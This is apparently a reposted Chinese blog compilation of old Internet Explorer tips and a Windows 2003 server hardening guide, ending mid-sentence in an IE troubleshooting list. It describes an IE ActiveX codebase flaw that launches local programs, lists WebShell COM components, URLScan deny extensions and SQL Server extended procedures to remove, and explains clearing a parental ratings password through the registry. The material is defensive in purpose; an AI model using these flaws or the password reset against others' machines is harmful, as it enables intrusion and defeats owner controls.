为了加快浏览速度,IE会自动把你浏览过的网页保存在缓存文件夹“C:/Windows/Temporary Internet Files”下。当你确认不再需要浏览过的网页时,在此选中所有网页,删除即可。或者在“Internet选项”的“常规”标签下单击“Internet 临时文件”项目中的“删除文件”按钮,在打开的“删除文件”对话框中选中“删除所有脱机内容”,单击“确定”,这种方法会遗留少许Cookie在文件夹 内,为此IE6.0在“删除文件”按钮旁边增加了一个“删除Cookie”的按钮,通过它可以很方便地删除遗留的。
6.永远不怕IE主页地址被修改
众所周知,修改IE默认主页地址是恶意网页常用的一招。IE被修改后,会自动连接到恶意网页的地址。大家常用的方法是修改注册表,其实,只要简单给IE加个参数,就再也不害怕主页地址被修改了。下面是具体的方法和步骤。
首先,打开“我的电脑”,找到IE的安装目录,这里假设你的IE安装在C:Program FilesInternet Explorer下。进入该文件夹,找到Iexplore.exe文件,对着它点击鼠标右键,在弹出的快捷菜单中选择“发送到→桌面快捷方式”,这样就在 桌面上建立了一个Iexplore.exe文件的快捷方式。如果你够仔细的话,你会发现你建立的这个快捷方式名字为“Iexplore.exe”,而桌面 上原来的IE快捷方式名字为“Internet Explorer”,两者不仅名字不相同,而且“内涵”也不尽相同。
继续我们的工作,用鼠标右键单击该快捷方式,选择“属性”,会弹出“Iexplore.exe 属性”对话框,选择其中的“快捷方式”标签,然后在“目标”框里填入:"C:Program FilesInternet ExplorerIEXPLORE.EXE" -nohome,给Iexplore.exe加上参数“-nohome”,输入时请大家注意在参数“-nohome”前面有一个空格,不要忘了,输入完 毕。点击“确定”退出即可。
这样即使主页被修改也没有关系,打开IE就是一片空白,就连about:blank也不显示。而且这样能够加快启动速度,一点IE窗口马上就出蹦来了。
对于IE在安装时自己建立的快捷方式,我们无法为它加上上述参数。如果不信可以试试,用鼠标右键点击桌面上原来IE自建的快捷方式,选“属性”,会发 现“目标”栏、“起始位置”栏、“快捷键”栏和“运行方式”栏都是灰色不可选取状态。这就是它们之间最大的不同!也是本文的关键所在。
7.挖出IE本地安全配置选项
在IE中可以通过点击“工具→Internet选项→安全”来设定电脑安全等级,之后会出现。从图中可以看出,在安全性设定中我们只能设定 Internet、本地Intranet、受信任的站点、受限制的站点。不过,惯于隐藏其部分功能的微软(真不知微软是怎么想的,老和我们玩“捉迷藏”游 戏),在这里又留了一手:其实这里还有一个隐藏的选项??就是“我的电脑”的安全性设定,如果你想看到它,可以通过修改注册表的方法来达到目的。
下面是具体的方法:打开“开始”菜单中的“运行”,在弹出的“运行”对话框中输入Regedit.exe,打开注册表编辑器,点击前面的“+”号顺次 展开到:HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZones,在右边窗口中找到DWORD值“Flags”,默认键值为十六进制的21(十进制33),双击“Flags”,在弹出的对话 框中将它的键值改为“1”即可,关闭注册表编辑器。无需重新启动电脑,重新打开IE,再次点击“工具→Internet选项→安全”标签,你就会看到多了 一个“我的电脑”,在这里你可以对IE的本地安全进行配置。
这个小技巧有什么用呢?把下面的代码保存为一个html文件,然后运行试试就知道了:
运行上面的html文件,会打开你的计算机中c:/winnt/system32文件夹下的calc.exe文件!而且IE没有任何提示!即使在IE 的安全设置中禁用ActiveX控件上述代码也能工作!如果不是calc.exe文件而是其他恶意文件又会怎么样?如果是在你浏览的网页中含有类似上面的 代码又会怎么样?真危险啊!
之所以会这样是由于IE存在两个可怕的漏洞:可本地执行任意命令,IE的ActiveX安全设置可被绕过。在上述代码中我们给IE指定了一个系统中并 不存在的控件号("clsid:88888888-8888-8888-8888-888888888888),IE会试图从codebase指定的地址 去下载并安装改控件。根据codebase于是IE找到了c:/winnt/system32/calc.exe,接着IE开始“下载”并安装该程序。由 于calc.exe是EXE文件,这样就等于是在运行该文件,所以calc.exe就被运行了!
那么为什么IE在“下载安装控件”过程中不提示用户,也不应用IE安全设置中的限定进行检测呢?这就是IE的ActiveX安全设置可被绕过漏洞造成 的!其主要原因是IE安全设置都是针对非本地的页面或交互的,对于本地的安全设置IE是最大信任的。如果你注意看IE的安全设置,都是对Internet 和Intranet上WEB服务器而言的,根本就没有对本地文件的安全设置。概括说来就是IE对本地安全采用最大信任原则。
解决的办法就是我们在开始说的那个技巧:挖出挖出IE本地安全配置选项,即修改IE安全设置中有关“我的电脑”的设置,选定后,禁用ActiveX下载就万事大吉了。
8.在DOS下打开“Internet属性”窗口
有时在浏览了某些恶意网页后,会导致IE的“Internet属性”对话框无法打开,这时我们可以在DOS窗口下输入:RunDll32.exe shell32.dll,Control_RunDLL inetcpl.cpl命令,就可打开IE的“Internet属性”对话框。要注意“Control_RunDLL”的大小写以及它前面的逗号(,)不 要忘记了。RunDll32.exe是Windows动态链接库(DLL)管理工具,可以用来在命令行下执行动态链接库中的某个函数(或者功能模块)。
RunDll32的使用方法如下:RunDll32.EXE , ,要注意以下几点:
①Dllname(就是制定DLL动态链接库所在位置和文件名)直接不能有空格;
②Dllname和entrypoint两者之间只能以“,”(逗号)分隔,逗号之后不能有空格,如果这里出错的话,你不会得到任何提示;
③optional arguments动态链接库调用参数,这个参数对大小写是很敏感的,注意不要写错。
9.解除IE的分级审查口令
有些时候,我们的IE会被人修改为设有分级审查口令,一旦被设置了分级审查口令,即使重新安装IE也是没有用的。怎么办呢?难道要格式化硬盘?千万不要!这里我有一个好办法,帮您解决这个问题。
进入注册表,找到 HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionpoliciesRatings, 这里有一个名为“key”的主键,这就是您设置的分级审查口令,直接将它删除即可。重新启动之后,点击“工具”→“Internet选项”→“内容”→ “分级审查”,您会发现分级审查口令已经被复位了。现在您只要输入新的分级审查口令即可。
如果你用的是Windows 9x则更简单了,到C:Windowssystem目录里找到rating.pol文件,要注意这是一个隐藏文件,直接将它删除就可以解决问题了。
10. 预防网页恶意代码
许多恶意网页为防止有人查看其代码内容,采取了各种各样的方法求防止我们查看其源代码。然而,他们的一切努力也许都是白费心机。因为用如下的方法可以 轻易地查看其源代码。只要在IE地址栏中输入View-Source:URL即可。举个例子,你想查看某网站 http://yixiao.unibbs.net 的源代码,只要在IE地址栏中输入:View-Source http://yixiao.unibbs.net,稍等一下就会弹出一个窗口,里面就是你想看到的网页源代码。赶快仔细看看,里面是否有更改注册表或暗 中下载文件的恶意代码,如果有那就别进该网页了,很简单吧?这样做不仅可以学到别人的网页制作技术,更可以事先预防恶意代码,一举两得~
Windows Internet服务器安全配置
<!-- / icon and title --><!-- message -->
原理篇
我们将从入侵者入侵的各个环节来作出对应措施一步步的加固windows系统.一共归于几个方面
1.端口限制
2.设置ACL权限
3.关闭服务或组件
4.包过滤
5.审计
我们现在开始从入侵者的第一步开始.对应的开始加固已有的windows系统.
1.扫描
这是入侵者在刚开始要做的第一步.比如搜索有漏洞的服务.
对应措施:端口限制
以下所有规则.都需要选择镜像,否则会导致无法连接
我们需要作的就是打开服务所需要的端口.而将其他的端口一律屏蔽
2.下载信息
这里主要是通过URL SCAN.来过滤一些非法请求
对应措施:过滤相应包
我们通过安全URL SCAN并且设置urlscan.ini中的DenyExtensions字段
来阻止特定结尾的文件的执行
3.上传文件
入侵者通过这步上传WEBSHELL,提权软件,运行cmd指令等等.
对应措施:取消相应服务和功能,设置ACL权限
如果有条件可以不使用FSO的.
通过 regsvr32 /u c:\windows\system32\scrrun.dll来注销掉相关的DLL.
如果需要使用.
那就为每个站点建立一个user用户
对每个站点相应的目录.只给这个用户读,写,执行权限,给administrators全部权限
安装杀毒软件.实时杀除上传上来的恶意代码.
个人推荐MCAFEE或者卡巴斯基
如果使用MCAFEE.对WINDOWS目录所有添加与修改文件的行为进行阻止.
4.WebShell
入侵者上传文件后.需要利用WebShell来执行可执行程序.或者利用WebShell进行更加方便的文件操作.
对应措施:取消相应服务和功能
一般WebShell用到以下组件
WScript.Network
WScript.Network.1
WScript.Shell
WScript.Shell.1
Shell.Application
Shell.Application.1
我们在注册表中将以上键值改名或删除
同时需要注意按照这些键值下的CLSID键的内容
从/HKEY_CLASSES_ROOT/CLSID下面对应的键值删除
5.执行SHELL
入侵者获得shell来执行更多指令
对应措施:设置ACL权限
windows的命令行控制台位于\WINDOWS\SYSTEM32\CMD.EXE
我们将此文件的ACL修改为
某个特定管理员帐户(比如administrator)拥有全部权限.
其他用户.包括system用户,administrators组等等.一律无权限访问此文件.
6.利用已有用户或添加用户
入侵者通过利用修改已有用户或者添加windows正式用户.向获取管理员权限迈进
对应措施:设置ACL权限.修改用户
将除管理员外所有用户的终端访问权限去掉.
限制CMD.EXE的访问权限.
限制SQL SERVER内的XP_CMDSHELL
7.登陆图形终端
入侵者登陆TERMINAL SERVER或者RADMIN等等图形终端,
获取许多图形程序的运行权限.由于WINDOWS系统下绝大部分应用程序都是GUI的.
所以这步是每个入侵WINDOWS的入侵者都希望获得的
对应措施:端口限制
入侵者可能利用3389或者其他的木马之类的获取对于图形界面的访问.
我们在第一步的端口限制中.对所有从内到外的访问一律屏蔽也就是为了防止反弹木马.
所以在端口限制中.由本地访问外部网络的端口越少越好.
如果不是作为MAIL SERVER.可以不用加任何由内向外的端口.
阻断所有的反弹木马.
8.擦除脚印
入侵者在获得了一台机器的完全管理员权限后
就是擦除脚印来隐藏自身.
对应措施:审计
首先我们要确定在windows日志中打开足够的审计项目.
如果审计项目不足.入侵者甚至都无需去删除windows事件.
其次我们可以用自己的cmd.exe以及net.exe来替换系统自带的.
将运行的指令保存下来.了解入侵者的行动.
对于windows日志
我们可以通过将日志发送到远程日志服务器的方式来保证记录的完整性.
evtsys工具(https://engineering.purdue.edu/ECN/Resources/Documents)
提供将windows日志转换成syslog格式并且发送到远程服务器上的功能.
使用此用具.并且在远程服务器上开放syslogd,如果远程服务器是windows系统.
推荐使用kiwi syslog deamon.
我们要达到的目的就是
不让入侵者扫描到主机弱点
即使扫描到了也不能上传文件
即使上传文件了不能操作其他目录的文件
即使操作了其他目录的文件也不能执行shell
即使执行了shell也不能添加用户
即使添加用户了也不能登陆图形终端
即使登陆了图形终端.拥有系统控制权.他的所作所为还是会被记录下来.
额外措施:
我们可以通过增加一些设备和措施来进一步加强系统安全性.
1.代理型防火墙.如ISA2004
代理型防火墙可以对进出的包进行内容过滤.
设置对HTTP REQUEST内的request string或者form内容进行过滤
将SELECT.DROP.DELETE.INSERT等都过滤掉.
因为这些关键词在客户提交的表单或者内容中是不可能出现的.
过滤了以后可以说从根本杜绝了SQL 注入
2.用SNORT建立IDS
用另一台服务器建立个SNORT.
对于所有进出服务器的包都进行分析和记录
特别是FTP上传的指令以及HTTP对ASP文件的请求
可以特别关注一下.
本文提到的部分软件在提供下载的RAR中包含
包括COM命令行执行记录
URLSCAN 2.5以及配置好的配置文件
IPSEC导出的端口规则
evtsys
一些注册表加固的注册表项.
实践篇
下面我用的例子.将是一台标准的虚拟主机.
系统:windows2003
服务:[IIS] [SERV-U] [IMAIL] [SQL SERVER 2000] [PHP] [MYSQL]
描述:为了演示,绑定了最多的服务.大家可以根据实际情况做筛减
1.WINDOWS本地安全策略 端口限制
A.对于我们的例子来说.需要开通以下端口
外->本地 80
外->本地 20
外->本地 21
外->本地 PASV所用到的一些端口
外->本地 25
外->本地 110
外->本地 3389
然后按照具体情况.打开SQL SERVER和MYSQL的端口
外->本地 1433
外->本地 3306
B.接着是开放从内部往外需要开放的端口
按照实际情况,如果无需邮件服务,则不要打开以下两条规则
本地->外 53 TCP,UDP
本地->外 25
按照具体情况.如果无需在服务器上访问网页.尽量不要开以下端口
本地->外 80
C.除了明确允许的一律阻止.这个是安全规则的关键.
外->本地 所有协议 阻止
2.用户帐号
a.将administrator改名,例子中改为root
b.取消所有除管理员root外所有用户属性中的
远程控制->启用远程控制 以及
终端服务配置文件->允许登陆到终端服务器
c.将guest改名为administrator并且修改密码
d.除了管理员root,IUSER以及IWAM以及ASPNET用户外.禁用其他一切用户.包括SQL DEBUG以及TERMINAL USER等等
3.目录权限
将所有盘符的权限,全部改为只有
administrators组 全部权限
system 全部权限
将C盘的所有子目录和子文件继承C盘的administrator(组或用户)和SYSTEM所有权限的两个权限
然后做如下修改
C:\Program Files\Common Files 开放Everyone 默认的读取及运行 列出文件目录 读取三个权限
C:\WINDOWS\ 开放Everyone 默认的读取及运行 列出文件目录 读取三个权限
C:\WINDOWS\Temp 开放Everyone 修改,读取及运行,列出文件目录,读取,写入权限
现在WebShell就无法在系统目录内写入文件了.
当然也可以使用更严格的权限.
在WINDOWS下分别目录设置权限.
可是比较复杂.效果也并不明显.
4.IIS
在IIS 6下.应用程序扩展内的文件类型对应ISAPI的类型已经去掉了IDQ,PRINT等等危险的脚本类型,
在IIS 5下我们需要把除了ASP以及ASA以外所有类型删除.
安装URLSCAN
在[DenyExtensions]中
一般加入以下内容
.cer
.cdx
.mdb
.bat
.cmd
.com
.htw
.ida
.idq
.htr
.idc
.shtm
.shtml
.stm
.printer
这样入侵者就无法下载.mdb数据库.这种方法比外面一些在文件头加入特殊字符的方法更加彻底.
因为即便文件头加入特殊字符.还是可以通过编码构造出来的
5.WEB目录权限
作为虚拟主机.会有许多独立客户
比较保险的做法就是为每个客户,建立一个windows用户
然后在IIS的响应的站点项内
把IIS执行的匿名用户.绑定成这个用户
并且把他指向的目录
权限变更为
administrators 全部权限
system 全部权限
单独建立的用户(或者IUSER) 选择高级->打开除 完全控制,遍历文件夹/运行程序,取得所有权 3个外的其他权限.
如果服务器上站点不多.并且有论坛
我们可以把每个论坛的上传目录
去掉此用户的执行权限.
只有读写权限
这样入侵者即便绕过论坛文件类型检测上传了webshell
也是无法运行的.
6.MS SQL SERVER2000
使用系统帐户登陆查询分析器
运行以下脚本
use master
exec sp_dropextendedproc 'xp_cmdshell'
exec sp_dropextendedproc 'xp_dirtree'
exec sp_dropextendedproc 'xp_enumgroups'
exec sp_dropextendedproc 'xp_fixeddrives'
exec sp_dropextendedproc 'xp_loginconfig'
exec sp_dropextendedproc 'xp_enumerrorlogs'
exec sp_dropextendedproc 'xp_getfiledetails'
exec sp_dropextendedproc 'Sp_OACreate'
exec sp_dropextendedproc 'Sp_OADestroy'
exec sp_dropextendedproc 'Sp_OAGetErrorInfo'
exec sp_dropextendedproc 'Sp_OAGetProperty'
exec sp_dropextendedproc 'Sp_OAMethod'
exec sp_dropextendedproc 'Sp_OASetProperty'
exec sp_dropextendedproc 'Sp_OAStop'
exec sp_dropextendedproc 'Xp_regaddmultistring'
exec sp_dropextendedproc 'Xp_regdeletekey'
exec sp_dropextendedproc 'Xp_regdeletevalue'
exec sp_dropextendedproc 'Xp_regenumvalues'
exec sp_dropextendedproc 'Xp_regread'
exec sp_dropextendedproc 'Xp_regremovemultistring'
exec sp_dropextendedproc 'Xp_regwrite'
drop procedure sp_makewebtask
go
删除所有危险的扩展.
7.修改CMD.EXE以及NET.EXE权限
将两个文件的权限.修改到特定管理员才能访问,比如本例中.我们如下修改
cmd.exe root用户 所有权限
net.exe root用户 所有权现
这样就能防止非法访问.
还可以使用例子中提供的comlog程序
将com.exe改名_com.exe,然后替换com文件.这样可以记录所有执行的命令行指令
8.备份
使用ntbackup软件.备份系统状态.
使用reg.exe 备份系统关键数据
如reg export HKLM\SOFTWARE\ODBC e:\backup\system\odbc.reg /y
来备份系统的ODBC
9.杀毒
这里介绍MCAFEE 8i 中文企业版
因为这个版本对于国内的许多恶意代码和木马都能够及时的更新.
比如已经能够检测到海阳顶端2006
而且能够杀除IMAIL等SMTP软件使用的队列中MIME编码的病毒文件
而很多人喜欢安装诺顿企业版.而诺顿企业版,对于WEBSHELL.基本都是没有反应的.
而且无法对于MIME编码的文件进行杀毒.
在MCAFEE中.
我们还能够加入规则.阻止在windows目录建立和修改EXE.DLL文件等
我们在软件中加入对WEB目录的杀毒计划.
每天执行一次
并且打开实时监控.
10.关闭无用的服务
我们一般关闭如下服务
Computer Browser
Help and Support
Messenger
Print Spooler
Remote Registry
TCP/IP NetBIOS Helper
如果服务器不用作域控,我们也可以禁用
Workstation
11.取消危险组件
如果服务器不需要FSO
regsvr32 /u c:\windows\system32\scrrun.dll
注销组件
使用regedit
将/HKEY_CLASSES_ROOT下的
WScript.Network
WScript.Network.1
WScript.Shell
WScript.Shell.1
Shell.Application
Shell.Application.1
键值改名或删除
将这些键值下CLSID中包含的字串
如{72C24DD5-D70A-438B-8A42-98424B88AFB8}
到/HKEY_CLASSES_ROOT/CLSID下找到以这些字串命名的键值
全部删除
12.审计
本地安全策略->本地策略->审核策略
打开以下内容
审核策略更改 成功,失败
审核系统事件 成功,失败
审核帐户登陆事件 成功,失败
审核帐户管理 成功,失败
[补充]Windows IE 浏览器的故障整理
<!-- / icon and title --><!-- message -->
1.发送错误报告
「故障现象」
在使用IE浏览网页的过程中,出现“Microsoft Internet Explorer遇到问题需要关闭……”的信息提示。此时,如果单击“发送错误报告”按钮,则会创建错误报告,单击“关闭”按钮之后会引起当前IE窗口关 闭;如果单击“不发送”按钮,则会关闭所有IE窗口。
「故障点评」
这是IE为了解用户在使用中的错误而设计的一个小程序,不过我可不想当微软的“免费测试员”,更何况每天它都会面对成千上万的报告,谁知道有
分享到:
- 浏览: 2477014 次
- 性别:
- 来自: 上海
评论